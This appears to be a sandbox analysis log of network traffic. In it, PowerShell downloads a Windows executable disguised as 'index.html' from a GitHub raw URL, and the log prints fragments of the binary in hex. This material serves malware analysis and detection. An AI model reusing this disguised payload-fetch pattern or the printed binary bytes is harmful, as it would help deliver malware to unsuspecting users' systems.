                                                                        2023-01-21 00:14:26 UTC2INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 6f 63 74 6f 3d 47 48 31 2e 31 2e 36 39 35 31 34 38 32 34 2e 31 36 37 34 32 36 30 30 36 36 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 67 69 74 68 75 62 2e 63 6f 6d 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 31 20 4a 61 6e 20 32 30 32 34 20 30 30 3a 31 34 3a 32 36 20 47 4d 54 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 6f 67 67 65 64 5f 69 6e 3d 6e 6f 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 67 69 74 68 75 62 2e 63 6f 6d 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 31 20 4a 61 6e 20 32 30 32 34 20 30 30 3a 31 34 3a 32 36 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78
                                                                        Data Ascii: Set-Cookie: _octo=GH1.1.69514824.1674260066; Path=/; Domain=github.com; Expires=Sun, 21 Jan 2024 00:14:26 GMT; Secure; SameSite=LaxSet-Cookie: logged_in=no; Path=/; Domain=github.com; Expires=Sun, 21 Jan 2024 00:14:26 GMT; HttpOnly; Secure; SameSite=Lax


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.549703140.82.121.4443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2023-01-21 00:14:26 UTC3OUTGET /john-xor/temp/raw/main/index.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                        Host: github.com
                                                                        Cookie: _gh_sess=fb6TJ47A5BrqAuYq7xtaFuqWpH7VQEGHn7R2DM0HaSuWCZJLJWjyiNHiDwPIhOet1HmY15hHxFAptsqTyxWZ6048x%2F%2BzTz3WeNA5IP3w7%2FAPms%2FYJQHwAeVzYU%2BsYlTrwcL9dwbENMNHhaRTE08OQigvfaXVTMEoG%2FX051yu0lk5%2Fe1ctRFpHHw70HFCTlAIg1OBEnrm8I3X8%2BYVfiilz5KJ1HVLiEzuyspmhMzX6aQns69GYZjebwPCi66pUNIYu%2FWXnZAhKOYGv9PTz3fELA%3D%3D--sMySSnXnSldWPFRK--jfNtkM22fd04aSpsP%2F1NCw%3D%3D; _octo=GH1.1.69514824.1674260066; logged_in=no
                                                                        2023-01-21 00:14:26 UTC3INHTTP/1.1 302 Found
                                                                        Server: GitHub.com
                                                                        Date: Sat, 21 Jan 2023 00:14:26 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                        Location: https://raw.githubusercontent.com/john-xor/temp/main/index.html
                                                                        Cache-Control: no-cache
                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                        X-Frame-Options: deny
                                                                        X-Content-Type-Options: nosniff
                                                                        X-XSS-Protection: 0
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        2023-01-21 00:14:26 UTC4INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.549704185.199.108.133443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2023-01-21 00:14:26 UTC6OUTGET /john-xor/temp/main/index.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        2023-01-21 00:14:27 UTC6INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 276992
                                                                        Cache-Control: max-age=300
                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                        Content-Type: application/octet-stream
                                                                        ETag: "a6eee393f00beb4e62fa205262eaa9ef0eaaec82080b0ed84f88f1b8bd6cfd76"
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: deny
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-GitHub-Request-Id: 7E5E:C527:EB7B43:FBE547:63CB2E62
                                                                        Accept-Ranges: bytes
                                                                        Date: Sat, 21 Jan 2023 00:14:27 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-mxp6934-MXP
                                                                        X-Cache: MISS
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1674260067.921309,VS0,VE169
                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Fastly-Request-ID: ce57d474facabde6b39b87e39b2fa8b94770b853
                                                                        Expires: Sat, 21 Jan 2023 00:19:27 GMT
                                                                        Source-Age: 0
                                                                        2023-01-21 00:14:27 UTC7INData Raw: 4d 5a 41 52 55 48 89 e5 48 81 ec 20 00 00 00 48 8d 1d ea ff ff ff 48 89 df 48 81 c3 3c 6e 01 00 ff d3 41 b8 f0 b5 a2 56 68 04 00 00 00 5a 48 89 f9 ff d0 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a3 da ba e0 e7 bb d4 b3 e7 bb d4 b3 e7 bb d4 b3 81 55 1a b3 e6 bb d4 b3 c4 54 06 b3 7f bb d4 b3 79 1b 13 b3 e6 bb d4 b3 16 7d 1b b3 ce bb d4 b3 16 7d 1a b3 6e bb d4 b3 16 7d 19 b3 ed bb d4 b3 ee c3 47 b3 ec bb d4 b3 e7 bb d5 b3 31 bb d4 b3 c4 54 1a b3 d3 bb d4 b3 81 55 1e b3 e6 bb d4 b3 81 55 18 b3 e6 bb d4 b3 52 69 63 68 e7 bb d4 b3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Data Ascii: MZARUHH HHH<nAVhZH!L!This program cannot be run in DOS mode.$UTy}}n}G1TUURich
                                                                        2023-01-21 00:14:27 UTC8INData Raw: 24 58 48 8b 5c 24 50 48 8b 6c 24 60 48 8b 74 24 68 48 83 c4 20 41 5f 41 5e 41 5d 41 5c 5f c3 cc cc cc 48 8b c4 48 89 58 08 4c 89 40 18 57 48 83 ec 30 48 83 60 18 00 48 8b f9 8b da 48 8d 48 18 4c 8d 05 17 98 03 00 41 b9 01 00 00 00 33 d2 c7 40 e8 20 00 00 f0 ff 15 5a ce 02 00 85 c0 75 24 44 8d 48 01 4c 8d 05 f3 97 03 00 48 8d 4c 24 50 33 d2 c7 44 24 20 28 00 00 f0 ff 15 36 ce 02 00 85 c0 74 26 48 8b 4c 24 50 4c 8b c7 8b d3 ff 15 2a ce 02 00 83 f8 01 74 02 33 db 48 8b 4c 24 50 33 d2 ff 15 06 ce 02 00 8b c3 48 8b 5c 24 40 48 83 c4 30 5f c3 cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 49 8b f0 8b da 48 8b f9 e8 50 ff ff ff 85 c0 75 0d 4c 8b c6 8b d3 48 8b cf e8 8b fe ff ff 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc 48 8b c4 48 89 58 08 48 89
                                                                        Data Ascii: $XH\$PHl$`Ht$hH A_A^A]A\_HHXL@WH0H`HHHLA3@ Zu$DHLHL$P3D$ (6t&HL$PL*t3HL$P3H\$@H0_H\$Ht$WH IHPuLHH\$0Ht$8H _HHXH
                                                                        2023-01-21 00:14:27 UTC9INData Raw: 48 8b d1 8b 09 e8 26 2a 00 00 85 c0 75 1e 48 63 02 4c 8d 05 b4 70 04 00 48 8d 8a 88 00 00 00 48 69 c0 b0 00 00 00 42 ff 14 00 33 c0 48 83 c4 28 c3 cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f1 33 db 48 8d 3d 3d 70 04 00 48 8b 0f 48 85 c9 74 0c 48 8b d6 e8 7d 95 02 00 85 c0 74 21 ff c3 48 81 c7 b0 00 00 00 83 fb 20 7c de 83 c8 ff 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 8b c3 eb ec 40 53 48 83 ec 20 4c 8b c9 45 33 c0 48 8d 15 f9 6f 04 00 41 ba b0 00 00 00 48 83 7a f8 00 74 07 8a 41 08 38 02 74 3a 48 8d 05 de 85 04 00 49 03 d2 41 ff c0 48 3b d0 7c e0 48 8d 15 c4 6f 04 00 33 db 48 8b c2 48 83 38 00 74 1b 48 8d 0d b2 85 04 00 49 03 c2 ff c3 48 3b c1 7c e9 83 c8 ff eb 1f 41 8b c0 eb 1a 48 63 cb 4d 8b c2 48 69 c9 b0 00 00 00 48 03 ca 49
                                                                        Data Ascii: H&*uHcLpHHiB3H(H\$Ht$WH H3H==pHHtH}t!H |H\$0Ht$8H _@SH LE3HoAHztA8t:HIAH;|Ho3HH8tHIH;|AHcMHiHI
                                                                        2023-01-21 00:14:27 UTC11INData Raw: 4c 8b 84 24 b0 00 00 00 48 89 44 24 48 48 8b 84 24 c0 00 00 00 48 89 74 24 40 44 89 74 24 38 89 6c 24 30 48 89 44 24 28 44 89 4c 24 20 44 8b 8c 24 b8 00 00 00 e8 ac 29 00 00 85 c0 75 1f 8b 94 24 d8 00 00 00 4c 8b cf 4c 8b c6 48 8b ce 4c 89 7c 24 28 21 44 24 20 ff 15 1d b6 04 00 4c 8d 5c 24 60 49 8b 5b 30 49 8b 6b 38 49 8b 73 40 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 48 89 44 24 38 48 8b 84 24 c0 00 00 00 48 89 74 24 30 89 6c 24 28 48 89 44 24 20 e8 f3 27 00 00 eb 9d cc 48 89 5c 24 20 55 56 57 41 54 41 55 41 56 41 57 48 8d ac 24 10 ff ff ff 48 81 ec 70 02 00 00 48 8b 05 de 01 04 00 48 33 c4 48 89 85 e0 00 00 00 49 8b f8 49 8d 40 28 4c 8b f9 49 8d 48 20 44 8b e2 49 8d 50 30 49 83 c0 38 4c 8d 57 10 4c 8d 4f 40 48 89 4d a8 48 89 55 a0 4c 89 45 90 33 db 4c 8d
                                                                        Data Ascii: L$HD$HH$Ht$@Dt$8l$0HD$(DL$ D$)u$LLHL|$(!D$ L\$`I[0Ik8Is@IA_A^A]A\_HD$8H$Ht$0l$(HD$ 'H\$ UVWATAUAVAWH$HpHH3HII@(LIH DIP0I8LWLO@HMHULE3L
                                                                        2023-01-21 00:14:27 UTC12INData Raw: c8 43 89 4c 01 fa 48 ff ca 75 d0 4c 8d 4c 24 78 44 8d 52 30 41 8b 49 cc 41 8b 11 4d 8d 49 04 44 8b c1 8b c1 c1 e9 03 41 c1 c8 12 c1 c8 07 44 33 c0 8b c2 44 33 c1 8b ca c1 ea 0a c1 c9 13 c1 c8 11 33 c8 33 ca 44 03 c1 45 03 41 c4 45 03 41 e8 45 89 41 04 49 ff ca 75 bb 44 8b 74 24 18 8b 5c 24 28 44 8b 4c 24 30 44 8b 54 24 2c 8b 74 24 1c 8b 7c 24 20 44 8b 44 24 34 44 8b 5c 24 24 41 8b d1 41 33 d2 41 81 c0 98 2f 8a 42 8b cb c1 c9 19 23 d3 8b c3 c1 c8 0b 41 33 d1 45 8b fe 33 c8 8b c3 c1 c8 06 33 c8 41 8b c6 41 c1 cf 16 03 4c 24 40 03 d1 c1 c8 0d 8b ce 44 33 f8 41 0b ce 44 03 c2 23 cf 45 03 d8 41 8b c6 41 8b d2 33 d3 41 23 d3 c1 c8 02 44 33 f8 41 33 d2 8b c6 41 23 c6 0b c8 41 8b c3 44 03 f9 41 8b cb 45 03 f8 45 8d 81 91 44 37 71 c1 c8 0b 45 8b cf c1 c9 19 33 c8
                                                                        Data Ascii: CLHuLL$xDR0AIAMIDAD3D333DEAEAEAIuDt$\$(DL$0DT$,t$|$ DD$4D\$$AA3A/B#A3E33AAL$@D3AD#EAA3A#D3A3A#ADAEED7qE3
                                                                        2023-01-21 00:14:27 UTC13INData Raw: 80 c1 c9 19 33 c8 41 8b c7 41 8b fb c1 c8 06 33 c8 41 8b c3 c1 cf 16 03 4c 24 74 03 d1 c1 c8 0d 41 8b cb 33 f8 44 03 c2 0b cb 41 23 ca 45 03 c8 41 8b c3 41 8b d6 41 33 d7 41 23 d1 c1 c8 02 33 f8 41 33 d6 41 8b c3 23 c3 0b c8 41 8b c1 03 f9 41 8b c9 41 03 f8 44 8d 86 a7 06 dc 9b c1 c9 19 c1 c8 0b 33 c8 41 8b c1 c1 c8 06 33 c8 03 4c 24 78 03 d1 44 03 c2 45 03 d0 41 8b d7 8b f7 41 33 d1 c1 ce 16 8b c7 41 23 d2 c1 c8 0d 41 8b cb 33 f0 0b cf 41 33 d7 23 cb 8b c7 c1 c8 02 33 f0 41 8b c3 23 c7 0b c8 41 8b c2 03 f1 c1 c8 0b 41 8b ca 41 03 f0 c1 c9 19 45 8d 86 74 f1 9b c1 33 c8 41 8b c2 44 8b f6 c1 c8 06 33 c8 8b c6 41 c1 ce 16 03 4c 24 7c 03 d1 c1 c8 0d 8b cf 44 33 f0 0b ce 44 03 c2 41 23 cb 41 03 d8 8b c6 41 8b d1 41 33 d2 23 d3 c1 c8 02 44 33 f0 41 33 d1 8b c7
                                                                        Data Ascii: 3AA3AL$tA3DA#EAAA3A#3A3A#AAAD3A3L$xDEAA3A#A3A3#3A#AAAEt3AD3AL$|D3DA#AAA3#D3A3
                                                                        2023-01-21 00:14:27 UTC15INData Raw: c8 41 8b c6 03 d9 41 8b ce 41 03 d8 45 8d 83 f3 0b e0 c6 c1 c8 0b 44 8b db c1 c9 19 33 c8 41 8b c6 41 c1 cb 16 c1 c8 06 33 c8 8b c3 03 4d b0 03 d1 41 8b ca 0b cb c1 c8 0d 44 03 c2 44 33 d8 41 23 c9 45 03 f8 8b c3 c1 c8 02 44 33 d8 41 8b c2 23 c3 0b c8 41 8b c7 44 03 d9 c1 c8 0b 41 8b cf 45 03 d8 c1 c9 19 33 c8 41 8b c7 c1 c8 06 33 c8 8b d6 44 8d 87 47 91 a7 d5 03 4d b4 41 33 d6 41 8b fb 41 23 d7 c1 cf 16 41 8b c3 33 d6 c1 c8 0d 03 d1 33 f8 41 8b c3 44 03 c2 41 8b d6 41 8b cb c1 c8 02 0b cb 45 03 c8 33 f8 41 23 ca 41 33 d7 41 23 d1 41 8b c3 23 c3 41 33 d6 0b c8 41 8b c1 03 f9 41 8b c9 41 03 f8 c1 c8 0b 44 8d 86 51 63 ca 06 8b f7 c1 c9 19 33 c8 41 8b c1 c1 ce 16 c1 c8 06 33 c8 8b c7 03 4d b8 03 d1 41 8b cb 44 03 c2 c1 c8 0d 0b cf 33 f0 23 cb 45 03 d0 8b c7
                                                                        Data Ascii: AAAED3AA3MADD3A#ED3A#ADAE3A3DGMA3AA#A33ADAAE3A#A3A#A#A3AAADQc3A3MAD3#E
                                                                        2023-01-21 00:14:27 UTC16INData Raw: d3 33 d7 23 d6 c1 c8 02 44 33 d0 41 33 d3 41 8b c7 41 23 c1 0b c8 8b c6 44 03 d1 8b ce 45 03 d0 44 8d 83 a3 51 6c c7 c1 c8 0b 41 8b da c1 c9 19 33 c8 8b c6 c1 cb 16 c1 c8 06 33 c8 41 8b c2 03 4d ec 03 d1 41 8b c9 41 0b ca c1 c8 0d 44 03 c2 33 d8 41 23 cf 41 8b c2 c1 c8 02 33 d8 41 8b c1 41 23 c2 0b c8 03 d9 45 03 f0 41 03 d8 8b d7 33 d6 45 8d 83 19 e8 92 d1 41 8b ce c1 c9 19 41 23 d6 41 8b c6 c1 c8 0b 33 d7 44 8b db 33 c8 41 8b c6 c1 c8 06 33 c8 8b c3 41 c1 cb 16 03 4d f0 03 d1 c1 c8 0d 41 8b ca 44 33 d8 0b cb 44 03 c2 41 23 c9 45 03 f8 8b c3 8b d6 41 33 d6 41 23 d7 c1 c8 02 44 33 d8 33 d6 41 8b c2 23 c3 0b c8 41 8b c7 44 03 d9 41 8b cf 45 03 d8 44 8d 87 24 06 99 d6 c1 c8 0b 41 8b fb c1 c9 19 33 c8 41 8b c7 c1 cf 16 c1 c8 06 33 c8 41 8b c3 03 4d f4 03 d1
                                                                        Data Ascii: 3#D3A3AA#DEDQlA33AMAAD3A#A3AA#EA3EAA#A3D3A3AMAD3DA#EA3A#D33A#ADAED$A3A3AM
                                                                        2023-01-21 00:14:27 UTC17INData Raw: 8b c3 41 8b f6 c1 c8 06 33 c8 41 8b c6 c1 ce 16 03 4d 24 03 d1 c1 c8 0d 41 8b cf 33 f0 41 0b ce 44 03 c2 45 03 e0 41 23 cd 41 8b c6 c1 c8 02 33 f0 41 8b c7 41 23 c6 0b c8 41 8b c4 03 f1 c1 c8 0b 41 8b cc 41 03 f0 c1 c9 19 45 8b c3 33 c8 44 33 c3 41 8b c4 45 23 c4 8b fe c1 c8 06 33 c8 8b 45 28 44 33 c3 05 14 78 c8 84 03 c8 44 03 c1 45 03 c2 c1 cf 16 45 03 e8 41 8b d3 41 33 d4 41 8b ce 8b c6 0b ce c1 c8 0d 41 23 d5 33 f8 41 23 cf 41 33 d3 8b c6 c1 c8 02 33 f8 41 8b c6 23 c6 0b c8 41 8b c5 03 f9 c1 c8 0b 41 8b cd 41 03 f8 c1 c9 19 44 8d 83 08 02 c7 8c 33 c8 41 8b c5 8b df c1 c8 06 33 c8 8b c7 c1 cb 16 03 4d 2c 03 d1 c1 c8 0d 8b ce 33 d8 0b cf 44 03 c2 41 23 ce 45 03 f8 8b c7 41 8b d4 41 33 d5 41 23 d7 c1 c8 02 33 d8 41 33 d4 8b c6 23 c7 0b c8 41 8b c7 03 d9
                                                                        Data Ascii: A3AM$A3ADEA#A3AA#AAAE3D3AE#3E(D3xDEEAA3AA#3A#A33A#AAAD3A3M,3DA#EAA3A#3A3#A
                                                                        2023-01-21 00:14:27 UTC19INData Raw: 00 00 e8 07 36 02 00 85 c0 75 0d ff c3 48 83 c7 28 83 fb 02 7c 98 eb 05 b8 05 00 00 00 48 8b 8c 24 b0 00 00 00 48 33 cc e8 21 ff 01 00 4c 8d 9c 24 c0 00 00 00 49 8b 5b 10 49 8b 73 18 49 8b e3 5f c3 33 c0 c3 cc 45 33 c0 e9 58 d5 ff ff 83 22 00 33 c0 c3 cc cc 4c 8d 15 19 63 03 00 45 33 c0 49 8b d2 41 8d 40 01 3b 0a 74 15 4c 8d 0d 1c 63 03 00 48 83 c2 08 44 03 c0 49 3b d1 7c e9 f3 c3 49 63 c0 41 8b 44 c2 04 c3 cc 48 89 5c 24 08 57 48 83 ec 20 ba 18 00 00 00 48 8b f9 8d 4a e9 e8 f2 6f 02 00 48 89 07 48 85 c0 75 07 b8 0d 00 00 00 eb 1f 48 8b c8 e8 8b 35 00 00 8b c8 e8 94 ff ff ff 8b d8 85 c0 74 08 48 8b 0f e8 a6 74 01 00 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc 40 53 48 83 ec 20 48 8b d9 e8 1a 44 00 00 48 8b cb 48 83 c4 20 5b e9 7d 74 01 00 cc 48 83 ec 28 e8
                                                                        Data Ascii: 6uH(|H$H3!L$I[IsI_3E3X"3LcE3IA@;tLcHDI;|IcADH\$WH HJoHHuH5tHtH\$0H _@SH HDHH [}tH(
                                                                        2023-01-21 00:14:27 UTC20INData Raw: 84 f7 00 00 00 48 85 c0 0f 84 e6 00 00 00 48 8b d0 48 8b ce ff 54 1f 68 8b d8 85 c0 0f 85 b2 00 00 00 4c 8d 0d 53 5b 04 00 45 33 c0 46 39 44 0f 10 76 1c 48 8b 86 e8 00 00 00 42 8a 0c 00 80 f1 5c 43 88 0c 30 41 ff c0 46 3b 44 0f 10 72 e4 48 8b ce 42 ff 54 0f 58 8b d8 85 c0 75 77 48 8d 05 18 5b 04 00 49 8b d6 48 8b ce 44 8b 44 07 10 ff 54 07 60 8b d8 85 c0 75 5b 48 8d 05 fc 5a 04 00 45 8b c4 48 8b d5 48 8b ce ff 54 07 60 8b d8 85 c0 75 41 48 8d 05 e2 5a 04 00 49 8b d6 48 8b ce ff 54 07 68 8b d8 85 c0 75 2a 33 c9 45 85 e4 74 1d 49 8b d6 49 2b d7 41 3b 4d 00 73 11 42 8a 04 3a ff c1 41 88 07 49 ff c7 41 3b cc 72 e9 41 89 4d 00 33 db 48 8b 8e e8 00 00 00 e8 34 6f 01 00 48 8b cd e8 2c 6f 01 00 49 8b ce e8 24 6f 01 00 8b c3 eb 1a 49 8b ce e8 18 6f 01 00 48 85 ed
                                                                        Data Ascii: HHHThLS[E3F9DvHB\C0AF;DrHBTXuwH[IHDDT`u[HZEHHT`uAHZIHThu*3EtII+A;MsB:AIA;rAM3H4oH,oI$oIoH
                                                                        2023-01-21 00:14:27 UTC22INData Raw: 0c 26 33 d2 44 2b eb 41 83 ed 02 45 8b c5 e8 87 6d 01 00 48 8b 94 24 90 00 00 00 43 8d 0c 2c c6 04 31 01 ff c1 44 8b c3 48 03 ce e8 5a 71 01 00 48 63 84 24 c0 00 00 00 4c 8b 84 24 b8 00 00 00 4c 8d 0c 80 48 8d 05 7f b8 ff ff 41 8b d4 4d 03 c9 49 8b ce 42 ff 94 c8 78 ad 04 00 41 3b c4 74 0a bb 09 00 00 00 e9 da 00 00 00 44 8b ed 4d 8b cf 45 8b c4 45 2b ec 49 8b d6 8b cf 41 ff cd 44 89 6c 24 20 e8 31 0d 00 00 8b d8 85 c0 0f 85 b2 00 00 00 45 85 ed 74 19 49 8b cf 48 8b d6 45 8b c5 48 2b ce 8a 04 11 30 02 48 ff c2 49 ff c8 75 f3 4d 8b cf 45 8b c5 48 8b d6 8b cf 44 89 64 24 20 e8 f4 0c 00 00 8b d8 85 c0 75 79 4d 8b cc 45 85 e4 74 19 49 8b d7 49 8b ce 4d 8b c4 49 2b d6 8a 04 0a 30 01 48 ff c1 49 ff c8 75 f3 48 8b 84 24 d8 00 00 00 39 28 73 09 89 28 bb 06 00 00
                                                                        Data Ascii: &3D+AEmH$C,1DHZqHc$L$LHAMIBxA;tDMEE+IADl$ 1EtIHEH+0HIuMEHDd$ uyMEtIIMI+0HIuH$9(s(
                                                                        2023-01-21 00:14:27 UTC22INData Raw: 00 4d 85 f6 74 08 49 8b ce e8 2f 69 01 00 b8 0d 00 00 00 eb 05 b8 16 00 00 00 48 83 c4 48 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 cc cc 48 8b c4 48 89 48 08 48 89 50 10 4c 89 40 18 4c 89 48 20 53 57 48 83 ec 28 33 db 48 8d 78 10 48 85 c9 74 1c 48 83 c7 f8 ff 15 2a 88 04 00 85 c0 75 17 48 83 c7 08 ff c3 48 8b 0f 48 85 c9 75 e8 33 c0 48 83 c4 28 5f 5b c3 48 8b 4c 24 40 48 8d 7c 24 48 85 db 74 18 48 83 c7 f8 48 8b 09 ff 15 04 88 04 00 48 8d 7f 08 48 8b 0f ff cb 75 ec b8 0d 00 00 00 eb cc cc cc 48 85 c9 74 37 48 8b c4 48 89 48 08 48 89 50 10 4c 89 40 18 4c 89 48 20 53 48 83 ec 20 48 8d 58 10 48 83 c3 f8 ff 15 c5 87 04 00 48 8d 5b 08 48 8b 0b 48 85 c9 75 ee 48 83 c4 20 5b c3 cc cc cc 44 89 4c 24 20 4c 89 44 24 18 48 89 4c 24 08 55 53 56 57 48 8b ec 48 83 ec 58
                                                                        Data Ascii: MtI/iHHA_A^A]A\_^][HHHHPL@LH SWH(3HxHtH*uHHHu3H(_[HL$@H|$HtHHHHuHt7HHHHPL@LH SH HXHH[HHuH [DL$ LD$HL$USVWHHX
                                                                        2023-01-21 00:14:27 UTC38INData Raw: 00 8b ce 44 8b c7 45 33 d2 2b ee 41 d3 e0 45 33 db 44 2b c7 44 39 13 7e 3a 41 8b 01 8b cd 44 03 d7 8b d0 d3 ea 8b ce d3 e0 41 23 d0 41 0b c3 44 8b da 25 ff ff ff 0f 41 89 01 4d 8d 49 04 44 3b 13 7c d6 85 d2 74 0c 48 63 0b 48 8b 43 10 89 14 88 01 3b 48 8b cb e8 46 fe ff ff 33 c0 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 cc cc cc 48 8b c4 48 89 48 08 48 89 50 10 4c 89 40 18 4c 89 48 20 53 56 57 48 83 ec 20 33 db 48 8d 70 10 8b fb 48 85 c9 74 44 48 83 c6 f8 e8 68 e9 ff ff 85 c0 75 10 48 83 c6 08 ff c7 48 8b 0e 48 85 c9 75 e9 eb 27 48 8b 4c 24 40 48 8d 74 24 48 85 ff 74 14 48 83 c6 f8 e8 fd f7 ff ff 48 8d 76 08 48 8b 0e ff cf 75 f0 bb fe ff ff ff 8b c3 48 83 c4 20 5f 5e 5b c3 cc cc cc 48 85 c9 74 36 48 8b c4 48 89 48 08 48 89 50 10 4c 89
                                                                        Data Ascii: DE3+AE3D+D9~:ADA#AD%AMID;|tHcHC;HF3H\$0Hl$8Ht$@H _HHHHPL@LH SVWH 3HpHtDHhuHHHu'HL$@Ht$HtHHvHuH _^[Ht6HHHHPL
                                                                        2023-01-21 00:14:27 UTC54INData Raw: 00 00 48 8d 15 3c 1e 02 00 48 8d 4c 24 20 e8 72 07 00 00 48 8b 9b 08 40 00 00 48 85 db 75 d7 48 8d 4c 24 20 e8 58 07 00 00 48 8d 4c 24 20 8b d8 e8 bc 07 00 00 45 33 c0 48 8b c8 8b d3 ff d7 48 8d 4c 24 20 e8 b4 06 00 00 48 8b 5c 24 50 48 83 c4 40 5f c3 cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 48 8b 35 40 5b 03 00 48 8b f9 41 be 00 20 00 00 41 8b ce 48 63 da e8 f4 e8 00 00 45 8b c6 48 8b cf 48 8b d0 48 8b e8 c6 04 3b 00 e8 83 49 00 00 eb 4d 83 3e 01 75 41 48 8d 4e 04 4c 8b c5 48 8b c1 4c 2b c1 0f b6 10 46 0f b6 0c 00 41 2b d1 75 08 48 ff c0 45 85 c9 75 eb 85 d2 75 1b 21 16 4d 8b c6 e8 50 eb 00 00 48 8d 8e 04 20 00 00 4d 8b c6 33 d2 e8 3f eb 00 00 48 8b b6 08 40 00 00 48 85 f6 75 ae 4d 8b c6 33 d2 48 8b cd e8 26 eb 00 00
                                                                        Data Ascii: H<HL$ rH@HuHL$ XHL$ E3HHL$ H\$PH@_HHXHhHpHx AVH H5@[HA AHcEHHH;IM>uAHNLHL+FA+uHEuu!MPH M3?H@HuM3H&
                                                                        2023-01-21 00:14:27 UTC70INData Raw: 00 00 00 8d 5f 01 48 89 4c 24 48 48 8b 4c 24 70 48 89 74 24 40 48 89 7c 24 38 89 44 24 30 48 8b 44 24 68 48 89 44 24 28 44 8b cb 48 89 7c 24 20 ff 15 97 d7 01 00 85 c0 75 26 ff 15 1d da 01 00 48 8d 15 6e de 01 00 8d 4f 35 89 44 24 28 4d 8b cd 4d 8b c7 4c 89 64 24 20 e8 4f d9 ff ff 8b df 48 8b cd e8 01 3f 00 00 4c 8d 9c 24 f0 00 00 00 8b c3 49 8b 5b 30 49 8b 6b 38 49 8b 73 40 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 50 48 8b f9 b9 00 10 00 00 4d 8b e8 8b da e8 ba 3d 00 00 41 be 00 08 00 00 48 8b c8 41 8b d6 48 8b e8 e8 02 3f 00 00 41 8b d6 48 8b cd 48 8b f0 e8 f4 3e 00 00 48 8d 4c 24 38 44 8b c3 48 8b d7 4c 8b e0 e8 9d 3e 00 00 48 8d 4c 24 38 45 8b c6 48 